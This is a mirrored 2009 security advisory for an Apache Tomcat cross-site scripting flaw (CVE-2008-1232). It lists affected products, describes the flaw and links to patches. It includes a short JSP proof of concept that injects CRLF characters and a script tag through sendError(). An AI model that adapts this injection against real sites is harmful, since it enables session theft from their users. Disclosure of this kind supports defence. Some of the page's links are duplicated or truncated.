No account yet?
Home » Exploits » Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability E-mail
Feeds - Exploits
Written by Konstantin Kolinko   
Wednesday, 11 March 2009 22:09
Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability


-\\Bugtraq ID:
30496

-\\Class:
Input Validation Error

-\\CVE:
CVE-2008-1232


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Aug 01 2008 12:00AM

-\\Updated:
Mar 11 2009 05:46PM

-\\Credit:
Konstantin Kolinko



-\\Vulnerable:
WiKID Systems WiKID Server 3.0.4
VMWare VirtualCenter 2.0.2
VMWare VirtualCenter  2.5.Update 3 build 1
VMWare VirtualCenter  2.5.Update 3 build 1
VMWare VirtualCenter  2.5 Update 2
VMWare VirtualCenter  2.5 Update 1
VMWare VirtualCenter  2.5
VMWare ESX Server 3.0.3
VMWare ESX Server 3.0.2
VMWare ESX Server  3.5
Sun Solaris  9_x86
Sun Solaris  9
Sun Solaris  10.0_x86
Sun Solaris  10.0
Sun OpenSolaris  build snv_99
Sun OpenSolaris  build snv_96
Sun OpenSolaris  build snv_95
Sun OpenSolaris  build snv_92
Sun OpenSolaris  build snv_91
Sun OpenSolaris  build snv_90
Sun OpenSolaris  build snv_89
Sun OpenSolaris  build snv_88
Sun OpenSolaris  build snv_87
Sun OpenSolaris  build snv_86
Sun OpenSolaris  build snv_85
Sun OpenSolaris  build snv_84
Sun OpenSolaris  build snv_83
Sun OpenSolaris  build snv_82
Sun OpenSolaris  build snv_81
Sun OpenSolaris  build snv_80
Sun OpenSolaris  build snv_78
Sun OpenSolaris  build snv_77
Sun OpenSolaris  build snv_76
Sun OpenSolaris  build snv_68
Sun OpenSolaris  build snv_67
Sun OpenSolaris  build snv_64
Sun OpenSolaris  build snv_61
Sun OpenSolaris  build snv_59
Sun OpenSolaris  build snv_57
Sun OpenSolaris  build snv_50
Sun OpenSolaris  build snv_39
Sun OpenSolaris  build snv_36
Sun OpenSolaris  build snv_29
Sun OpenSolaris  build snv_22
Sun OpenSolaris  build snv_19
Sun OpenSolaris  build snv_13
Sun OpenSolaris  build snv_100
Sun OpenSolaris  build snv_02
Sun OpenSolaris  build snv_01
S.u.S.E. SUSE Linux Enterprise Server  10 SP2
S.u.S.E. openSUSE  11.0
S.u.S.E. openSUSE  10.3
S.u.S.E. openSUSE  10.2
RedHat Red Hat Network Satellite Server 5.0.1
RedHat Red Hat Network Satellite Server 5.0
RedHat Red Hat Network Satellite (for RHEL 4)  5.1
RedHat Fedora 9  0
RedHat Fedora 8  0
RedHat Enterprise Linux Desktop Workstation  5 client
RedHat Enterprise Linux Desktop  5 client
RedHat Enterprise Linux  5 server
RedHat Developer Suite AS4  3
RedHat Application Server WS4  2
RedHat Application Server ES4  2
RedHat Application Server AS4  2
Pardus Linux 2008  0
MandrakeSoft Linux Mandrake  2008.1 x86_64
MandrakeSoft Linux Mandrake  2008.1
MandrakeSoft Linux Mandrake  2008.0 x86_64
MandrakeSoft Linux Mandrake  2008.0
HP HP-UX  B.11.31
HP HP-UX  B.11.23
HP HP-UX  B.11.11
Avaya Meeting Exchange - Enterprise Edition  
Avaya Meeting Exchange 5.0 .0.52
Avaya Meeting Exchange  5.0
Avaya AES 4.2.1
Avaya AES 4.0.1
Avaya AES 3.1.6
Avaya AES 3.1.5
Avaya AES 3.1.4
Avaya AES 3.1.3
Avaya AES  4.2
Avaya AES  4.1
Avaya AES  4.0
Avaya AES  3.1
Avaya AES  3.0
Apple Mac OS X Server 10.5.5
Apache Software Foundation Tomcat 6.0.16
Apache Software Foundation Tomcat 6.0.15
Apache Software Foundation Tomcat 6.0.14
Apache Software Foundation Tomcat 6.0.13
Apache Software Foundation Tomcat 6.0.12
Apache Software Foundation Tomcat 6.0.11
Apache Software Foundation Tomcat 6.0.10
Apache Software Foundation Tomcat 6.0.9
Apache Software Foundation Tomcat 6.0.8
Apache Software Foundation Tomcat 6.0.7
Apache Software Foundation Tomcat 6.0.6
Apache Software Foundation Tomcat 6.0.5
Apache Software Foundation Tomcat 6.0.4
Apache Software Foundation Tomcat 6.0.3
Apache Software Foundation Tomcat 6.0.2
Apache Software Foundation Tomcat 6.0.1
Apache Software Foundation Tomcat 6.0
Apache Software Foundation Tomcat 5.5.26
Apache Software Foundation Tomcat 5.5.25
Apache Software Foundation Tomcat 5.5.24
Apache Software Foundation Tomcat 5.5.23
Apache Software Foundation Tomcat 5.5.22
Apache Software Foundation Tomcat 5.5.21
Apache Software Foundation Tomcat 5.5.20
Apache Software Foundation Tomcat 5.5.20
Apache Software Foundation Tomcat 5.5.19
Apache Software Foundation Tomcat 5.5.18
Apache Software Foundation Tomcat 5.5.17
Apache Software Foundation Tomcat 5.5.17
Apache Software Foundation Tomcat 5.5.16
Apache Software Foundation Tomcat 5.5.15
Apache Software Foundation Tomcat 5.5.14
Apache Software Foundation Tomcat 5.5.13
Apache Software Foundation Tomcat 5.5.12
Apache Software Foundation Tomcat 5.5.12
Apache Software Foundation Tomcat 5.5.11
Apache Software Foundation Tomcat 5.5.11
Apache Software Foundation Tomcat 5.5.10
Apache Software Foundation Tomcat 5.5.10
Apache Software Foundation Tomcat 5.5.9
Apache Software Foundation Tomcat 5.5.9
Apache Software Foundation Tomcat 5.5.8
Apache Software Foundation Tomcat 5.5.8
Apache Software Foundation Tomcat 5.5.7
Apache Software Foundation Tomcat 5.5.7
Apache Software Foundation Tomcat 5.5.6
Apache Software Foundation Tomcat 5.5.6
Apache Software Foundation Tomcat 5.5.5
Apache Software Foundation Tomcat 5.5.5
Apache Software Foundation Tomcat 5.5.4
Apache Software Foundation Tomcat 5.5.4
Apache Software Foundation Tomcat 5.5.3
Apache Software Foundation Tomcat 5.5.3
Apache Software Foundation Tomcat 5.5.2
Apache Software Foundation Tomcat 5.5.2
Apache Software Foundation Tomcat 5.5.1
Apache Software Foundation Tomcat 5.5.1
Apache Software Foundation Tomcat 5.5
Apache Software Foundation Tomcat 5.5
Apache Software Foundation Tomcat 4.1.37
Apache Software Foundation Tomcat 4.1.36
Apache Software Foundation Tomcat 4.1.36
Apache Software Foundation Tomcat 4.1.34
Apache Software Foundation Tomcat 4.1.34
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
Apache Software Foundation Tomcat 4.1.32
Apache Software Foundation Tomcat 4.1.31
Apache Software Foundation Tomcat 4.1.30
Apache Software Foundation Tomcat 4.1.29
Apache Software Foundation Tomcat 4.1.28
Apache Software Foundation Tomcat 4.1.24
Apache Software Foundation Tomcat 4.1.12
Apache Software Foundation Tomcat 4.1.10
Apache Software Foundation Tomcat 4.1.9 beta
Apache Software Foundation Tomcat 4.1.3 beta
Apache Software Foundation Tomcat 4.1.3
Apache Software Foundation Tomcat 4.1
Apache Software Foundation Tomcat 4.1
-BSDI BSD/OS 4.0
-Caldera OpenLinux 2.4
-Conectiva Linux 5.1
-Debian Linux 2.3
-Debian Linux 2.2
-Debian Linux 2.1
-Digital UNIX 4.0
-FreeBSD FreeBSD 5.0
-FreeBSD FreeBSD 4.5
-MandrakeSoft Linux Mandrake 7.1
-MandrakeSoft Linux Mandrake 7.0
-NetBSD NetBSD 1.4.2  x86
-NetBSD NetBSD 1.4.1  x86
-RedHat Linux 6.2  i386
-RedHat Linux 6.1  i386
-SGI IRIX 6.5
-SGI IRIX 6.4
-SGI IRIX 3.3
-Sun Solaris  8
-Sun Solaris  7.0



-\\Not Vulnerable:
WiKID Systems WiKID Server 3.0.5
Sun OpenSolaris  build snv_101
Apache Software Foundation Tomcat 6.0.18
Apache Software Foundation Tomcat 5.5.27
Apache Software Foundation Tomcat 4.1.38



-\\Discussion
Apache Tomcat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.  

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

The issue affects the following versions:

Tomcat 4.1.0 through 4.1.37
Tomcat 5.5.0 through 5.5.26
Tomcat 6.0.0 through 6.0.16



-\\Exploit(s)/PoC(s):
To exploit this issue, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example is available:

===============================================================
30496.txt
^^^^^^^^^^
<%@page contentType="text/html"%>
<%
~  // some unicode characters, that result in CRLF being printed
~  final String CRLF = "\u010D\u010A";

~  final String payload = CRLF + CRLF + "<script
type='text/javascript'>document.write('Hi, there!')</script><div
style='display:none'>";
~  final String message = "Authorization is required to access " + payload;
~  response.sendError(403, message);
%>




-\\Solution
Apache has released Tomcat 6.0.18 to address this issue in Apache 6. Fixes for Apache 4 and Apache 5 are available via the SVN repository. Please see the references for more information.


MandrakeSoft Linux Mandrake  2008.0
--Mandriva  tomcat5-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/

HP HP-UX  B.11.23
--HP  HPUXWSATW-B222-1123-32.depot
PA-32
http://software.hp.cohttp://software.hp.com
--HP  HPUXWSATW-B222-1123-64.depot
IA-64
http://software.hp.cohttp://software.hp.com
--HP  HPUXWSATW-B302-32.depot
IA-64
http://software.hp.cohttp://software.hp.com

Apache Software Foundation Tomcat 6.0.10
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.ghttp://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.13
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.ghttp://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.15
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.ghttp://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.16
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.ghttp://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.5
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.ghttp://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.7
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.ghttp://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.8
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.ghttp://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz



-\\Reference(s)
--Apache Tomcat 4.x vulnerabilities
http://tomcat.apache.org/security-4.htm  (Apache)
--Apache Tomcat 5.x vulnerabilities
http://tomcat.apache.org/security-5.htm  (Apache)
--Apache Tomcat 6.x vulnerabilities
http://tomcat.apache.org/security-6.htm  (Apache)
--Apache Tomcat Homepage
http://tomcat.apache.org  (Apache)
--Release Name: 3.0.5
https://sourceforge.net/project/shownotes.php?release_id=626903&group_id=14477  (WiKID Systems)
--Solution  251986 :   Security Vulnerabilities in Tomcat 5.5 may Lead to Cross S
http://sunsolve.sun.com/search/document.do?assetkey=1-66-251986-  (Sun Microsystem)
--[CVE-2008-1232] Apache Tomcat XSS vulnerability
http://www.securityfocus.com/archive/1/49502  (Mark Thomas < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)
--ASA-2008-401 - tomcat security update (RHSA-2008-0862)
http://support.avaya.com/elmodocs2/security/ASA-2008-401.ht  (Avaya)
--RHSA-2008:0648-10 tomcat security update
http://rhn.redhat.com/errata/RHSA-2008-0648.htm  (Red Hat)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff